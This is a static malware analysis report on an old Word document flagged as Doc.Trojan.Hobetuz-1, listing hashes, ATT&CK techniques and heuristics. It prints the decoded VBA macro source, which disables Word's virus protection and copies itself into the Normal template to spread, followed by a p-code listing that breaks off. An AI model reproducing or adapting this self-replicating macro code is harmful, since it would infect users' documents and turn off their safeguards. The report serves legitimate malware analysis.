Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2b82b0e62f933c30…

MALICIOUS

Office (OLE)

Size: 26.5 KB | Created: 1980-01-11 07:15:00 | Authoring application: Microsoft Word 8.0 | First seen: 2012-06-14
MD5: 9f91e8106cdbfd5d48c699a3eef6ab64 | SHA-1: faf19cc78d54a9cc51b52e6ccc4109b29d5f00e5 | SHA-256: 2b82b0e62f933c301c77a0840c07c4db482a1cebfe927765cc6176cc09a1e609
Risk score: 180

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1547.001 Registry Run Keys / Startup Folder

The sample contains VBA macros, specifically AutoOpen and AutoClose, which are designed to execute automatically when the document is opened or closed. The script attempts to copy its code into the Normal template, a common technique for establishing persistence. The ClamAV detection 'Doc.Trojan.Hobetuz-1' further supports the malicious nature of this file.

Heuristics (5)

  • ClamAV: Doc.Trojan.Hobetuz-1 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Hobetuz-1
  • VBA macros detected [medium, 2 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro [high] OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5349 bytes
SHA-256: 64f9258293846cc2c283b3b245f51eb92b648d044a0ec14920409627adc5c147

Preview: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit

Sub AutoOpen()
   On Error GoTo Salir
   Dim LineasPlantilla As Integer, LineasDoc As Integer
   
   Options.VirusProtection = False: Options.SaveNormalPrompt = False: Options.ConfirmConversions = False
   LineasDoc = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
   LineasPlantilla = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
   If LineasPlantilla > 10 And LineasDoc > 10 Then GoTo Salir
   If LineasPlantilla < 10 Then
      ActiveDocument.VBProject.VBComponents.Item(1).Name = NormalTemplate.VBProject.VBComponents.Item(1).Name
      NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.AddFromString ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
      NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.ReplaceLine 3, "Sub AutoClose()"
   Else
      If LineasDoc = 0 Then
         ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.AddFromString NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(1, NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
         ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
         ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.ReplaceLine 3, "Sub AutoOpen()"
      End If
   End If
   If (Len(ActiveDocument.Name) > 20) Then MsgBox "I'm sorry, you gotta virus", 48, "(======Hobetuz======)  ;-)"
Salir:
End Sub

' Processing file: /opt/analyzer/scan_staging/3d6fdeb51d9c46a0b4c5546a1e434cb8.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 2621 bytes
' Line #0:
' 	Option  (Explicit)
' Line #1:
' Line #2:
' 	FuncDefn (Sub AutoOpen())
' Line #3:
' 	OnError Salir 
' Line #4:
' 	Dim 
' 	VarDefn LineasPlantilla (As Integer)
' 	VarDefn LineasDoc (As Integer)
' Line #5:
' Line #6:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' 	BoS 0x0000 
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' 	BoS 0x0000 
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt ConfirmConversions 
' Line #7:
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	St LineasDoc 
' Line #8:
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	St LineasPlantilla 
' Line #9:
' 	Ld LineasPlantilla 
' 	LitDI2 0x000A 
' 	Gt 
' 	Ld LineasDoc 
' 	LitDI2 0x000A 
' 	Gt 
' 	And 
' 	If 
' 	BoSImplicit 
' 	GoTo Salir 
' 	EndIf 
' Line #10:
' 	Ld LineasPlantilla 
' 	LitDI2 0x000A 
' 	Lt 
' 	IfBlock 
' Line #11:
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd New 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemSt New 
' Line #12:
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd Lines 0x0002 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall AddFromString 0x0001 
' Line #13:
' 	LitDI2 0x0003 
' 	LitStr 0x000F "Sub AutoClose()"
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall ReplaceLine 0x0002 
' Line #14:
' 	ElseBlock 
' Line #15:
' 	Ld LineasDoc 
' 	LitDI2 0x0000 

... (truncated)